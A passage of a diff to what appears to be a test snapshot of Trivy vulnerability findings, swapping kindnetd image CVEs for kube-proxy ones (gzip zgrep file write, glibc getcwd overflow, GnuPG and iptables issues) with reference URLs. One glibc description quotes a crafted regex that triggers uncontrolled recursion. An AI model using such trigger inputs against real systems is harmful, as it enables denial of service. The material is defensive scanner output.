"https://bugzilla.redhat.com/show_bug.cgi?id=2127010", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", + "https://dev.gnupg.org/D556", + "https://dev.gnupg.org/T5993", + "https://marc.info/?l=oss-security&m=165696590211434&w=4", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + "https://security.netapp.com/advisory/ntap-20230324-0001/", + "https://www.cve.org/CVERecord?id=CVE-2022-3219", ], }, "category": "Vulnerability", - "description": "systemd, when updating file permissions, allows local users to change the permissions and SELinux security contexts for arbitrary files via a symlink attack on unspecified files.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "GnuPG can be made to spin on a relatively small input by (for example) crafting a public key with thousands of signatures attached, compressed down to just a few KB.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "TOCTOU race condition when updating file permissions and SELinux security contexts", + "name": "denial of service issue (resource consumption) using compressed packets", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2013-4392", + "value": "https://avd.aquasec.com/nvd/cve-2022-3219", }, { "type": "URL", - "value": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=725357", + "value": "https://access.redhat.com/security/cve/CVE-2022-3219", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2013/10/01/9", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2127010", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2013-4392", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3219", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=859060", + "value": "https://dev.gnupg.org/D556", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4392", + "value": "https://dev.gnupg.org/T5993", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2013-4392", + "value": "https://marc.info/?l=oss-security&m=165696590211434&w=4", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3219", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20230324-0001/", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3219", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-20386", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "1.10-4+deb11u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "1.10-4", + "packageName": "gzip", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", - "https://access.redhat.com/security/cve/CVE-2019-20386", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", - "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", - "https://linux.oracle.com/cve/CVE-2019-20386.html", - "https://linux.oracle.com/errata/ELSA-2020-4553.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", - "https://security.netapp.com/advisory/ntap-20200210-0002/", - "https://ubuntu.com/security/notices/USN-4269-1", - "https://usn.ubuntu.com/4269-1/", - "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "An issue was discovered in button_open in login/logind-button.c in systemd before 243. When executing the udevadm trigger command, a memory leak may occur.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "systemd: memory leak in button_open() in login/logind-button.c when udev events are received", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-20386", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00014.html", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-20386", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20386", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/commit/b2774a3ae692113e1f47a336a6c09bac9cfb49ad", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-20386.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-4553.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HZPCOMW5X6IZZXASCDD2CNW2DLF3YADC/", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-20386", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20200210-0002/", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4269-1", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://usn.ubuntu.com/4269-1/", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-20386", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2020-13529", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", - "references": [ - "http://www.openwall.com/lists/oss-security/2021/08/04/2", - "http://www.openwall.com/lists/oss-security/2021/08/17/3", - "http://www.openwall.com/lists/oss-security/2021/09/07/3", - "https://access.redhat.com/security/cve/CVE-2020-13529", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", - "https://linux.oracle.com/cve/CVE-2020-13529.html", - "https://linux.oracle.com/errata/ELSA-2021-4361.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", - "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", - "https://security.gentoo.org/glsa/202107-48", - "https://security.netapp.com/advisory/ntap-20210625-0005/", - "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", - "https://ubuntu.com/security/notices/USN-5013-1", - "https://ubuntu.com/security/notices/USN-5013-2", - "https://www.cve.org/CVERecord?id=CVE-2020-13529", - ], - }, - "category": "Vulnerability", - "description": "An exploitable denial-of-service vulnerability exists in Systemd 245. A specially crafted DHCP FORCERENEW packet can cause a server running the DHCP client to be vulnerable to a DHCP ACK spoofing attack. An attacker can forge a pair of FORCERENEW and DCHP ACK packets to reconfigure the server.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "systemd: DHCP FORCERENEW authentication not implemented can cause a system running the DHCP client to have its network reconfigured", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-13529", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/04/2", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/08/17/3", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/09/07/3", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2020-13529", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-13529", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2020-13529.html", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-4361.html", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42TMJVNYRY65B4QCJICBYOEIVZV3KUYI/", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-13529", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2012-2663", + "installedVersion": "1.8.7-1", + "packageName": "iptables", + "references": [ + "http://www.spinics.net/lists/netfilter-devel/msg21248.html", + "https://access.redhat.com/security/cve/CVE-2012-2663", + "https://bugzilla.redhat.com/show_bug.cgi?id=826702", + "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", + "https://www.cve.org/CVERecord?id=CVE-2012-2663", + ], + }, + "category": "Vulnerability", + "description": "extensions/libxt_tcp.c in iptables through 1.4.21 does not match TCP SYN+FIN packets in --syn rules, which might allow remote attackers to bypass intended firewall restrictions via crafted packets. NOTE: the CVE-2012-6638 fix makes this issue less relevant.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "iptables: --syn flag bypass", + "references": [ { "type": "URL", - "value": "https://security.gentoo.org/glsa/202107-48", + "value": "https://avd.aquasec.com/nvd/cve-2012-2663", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210625-0005/", + "value": "http://www.spinics.net/lists/netfilter-devel/msg21248.html", }, { "type": "URL", - "value": "https://talosintelligence.com/vulnerability_reports/TALOS-2020-1142", + "value": "https://access.redhat.com/security/cve/CVE-2012-2663", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-1", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=826702", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5013-2", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2012-2663", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2020-13529", + "value": "https://www.cve.org/CVERecord?id=CVE-2012-2663", }, ], "severity": "LOW", @@ -145689,314 +147278,286 @@ commonly used by applications.", { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31437", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-3374", + "installedVersion": "2.2.4", + "packageName": "libapt-pkg6.0", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "https://access.redhat.com/security/cve/cve-2011-3374", + "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", + "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", + "https://seclists.org/fulldisclosure/2011/Sep/221", + "https://security-tracker.debian.org/tracker/CVE-2011-3374", + "https://snyk.io/vuln/SNYK-LINUX-APT-116518", + "https://ubuntu.com/security/CVE-2011-3374", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify a sealed log file such that, in some views, not all existing and sealed log messages are displayed. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "It was found that apt-key in apt, all versions, do not correctly validate gpg keys with the master keyring, leading to a potential man-in-the-middle attack.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify a seale ...", + "name": "It was found that apt-key in apt, all versions, do not correctly valid ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31437", + "value": "https://avd.aquasec.com/nvd/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://access.redhat.com/security/cve/cve-2011-3374", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=642480", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://people.canonical.com/~ubuntu-security/cve/2011/CVE-2011-3374.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31438", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", - "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can truncate a sealed log file and then resume log sealing such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can truncate a sea ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31438", + "value": "https://seclists.org/fulldisclosure/2011/Sep/221", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://security-tracker.debian.org/tracker/CVE-2011-3374", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://snyk.io/vuln/SNYK-LINUX-APT-116518", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://ubuntu.com/security/CVE-2011-3374", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-31439", - "installedVersion": "241-7~deb10u5", - "packageName": "libsystemd0", + "fixedVersion": "2.31-13+deb11u4", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3999", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "https://github.com/kastel-security/Journald", - "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", - "https://github.com/systemd/systemd/releases", + "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "https://access.redhat.com/security/cve/CVE-2021-3999", + "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "https://linux.oracle.com/cve/CVE-2021-3999.html", + "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "https://security.netapp.com/advisory/ntap-20221104-0001/", + "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "https://ubuntu.com/security/notices/USN-5310-1", + "https://ubuntu.com/security/notices/USN-5310-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "https://www.openwall.com/lists/oss-security/2022/01/24/4", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** An issue was discovered in systemd 253. An attacker can modify the contents of past events in a sealed log file and then adjust the file such that checking the integrity shows no error, despite modifications. NOTE: the vendor reportedly sent "a reply denying that any of the finding was a security vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", + "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-31439", + "value": "https://avd.aquasec.com/nvd/cve-2021-3999", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald", + "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", }, { "type": "URL", - "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", + "value": "https://access.redhat.com/security/cve/CVE-2021-3999", }, { "type": "URL", - "value": "https://github.com/systemd/systemd/releases", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "4.13-3+deb10u1", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-46848", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", - "references": [ - "https://access.redhat.com/errata/RHSA-2023:0343", - "https://access.redhat.com/security/cve/CVE-2021-46848", - "https://bugs.gentoo.org/866237", - "https://bugzilla.redhat.com/2140058", - "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", - "https://errata.almalinux.org/9/ALSA-2023-0343.html", - "https://errata.rockylinux.org/RLSA-2023:0343", - "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", - "https://gitlab.com/gnutls/libtasn1/-/issues/32", - "https://linux.oracle.com/cve/CVE-2021-46848.html", - "https://linux.oracle.com/errata/ELSA-2023-0343.html", - "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", - "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", - "https://security.netapp.com/advisory/ntap-20221118-0006/", - "https://ubuntu.com/security/notices/USN-5707-1", - "https://www.cve.org/CVERecord?id=CVE-2021-46848", - ], - }, - "category": "Vulnerability", - "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "libtasn1: Out-of-bound access in ETYPE_OK", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-46848", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0343", + "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-46848", + "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", }, { "type": "URL", - "value": "https://bugs.gentoo.org/866237", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2140058", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0343", + "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "value": "https://ubuntu.com/security/notices/USN-5310-1", }, { "type": "URL", - "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "value": "https://ubuntu.com/security/notices/USN-5310-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2010-4756", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", + "references": [ + "http://cxib.net/stuff/glob-0day.c", + "http://securityreason.com/achievement_securityalert/89", + "http://securityreason.com/exploitalert/9223", + "https://access.redhat.com/security/cve/CVE-2010-4756", + "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "https://www.cve.org/CVERecord?id=CVE-2010-4756", + ], + }, + "category": "Vulnerability", + "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "value": "https://avd.aquasec.com/nvd/cve-2010-4756", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "value": "http://cxib.net/stuff/glob-0day.c", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "value": "http://securityreason.com/achievement_securityalert/89", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "value": "http://securityreason.com/exploitalert/9223", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "value": "https://access.redhat.com/security/cve/CVE-2010-4756", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5707-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", + "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-1000654", - "installedVersion": "4.13-3", - "packageName": "libtasn1-6", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.24.0 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2018-20796", + "installedVersion": "2.31-13+deb11u3", + "packageName": "libc-bin", "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00009.html", - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00018.html", - "http://www.securityfocus.com/bid/105151", - "https://access.redhat.com/security/cve/CVE-2018-1000654", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1000654", - "https://gitlab.com/gnutls/libtasn1/issues/4", - "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772@%3Cdev.mina.apache.org%3E", - "https://nvd.nist.gov/vuln/detail/CVE-2018-1000654", - "https://ubuntu.com/security/notices/USN-5352-1", - "https://www.cve.org/CVERecord?id=CVE-2018-1000654", + "http://www.securityfocus.com/bid/107160", + "https://access.redhat.com/security/cve/CVE-2018-20796", + "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "https://security.netapp.com/advisory/ntap-20190315-0002/", + "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "https://www.cve.org/CVERecord?id=CVE-2018-20796", ], }, "category": "Vulnerability", - "description": "GNU Libtasn1-4.13 libtasn1-4.13 version libtasn1-4.13, libtasn1-4.12 contains a DoS, specifically CPU usage will reach 100% when running asn1Paser against the POC due to an issue in _asn1_expand_object_id(p_tree), after a long time, the program will be killed. This attack appears to be exploitable via parsing a crafted file.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", + "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "libtasn1: Infinite loop in _asn1_expand_object_id(ptree) leads to memory exhaustion", + "name": "glibc: uncontrolled recursion in function 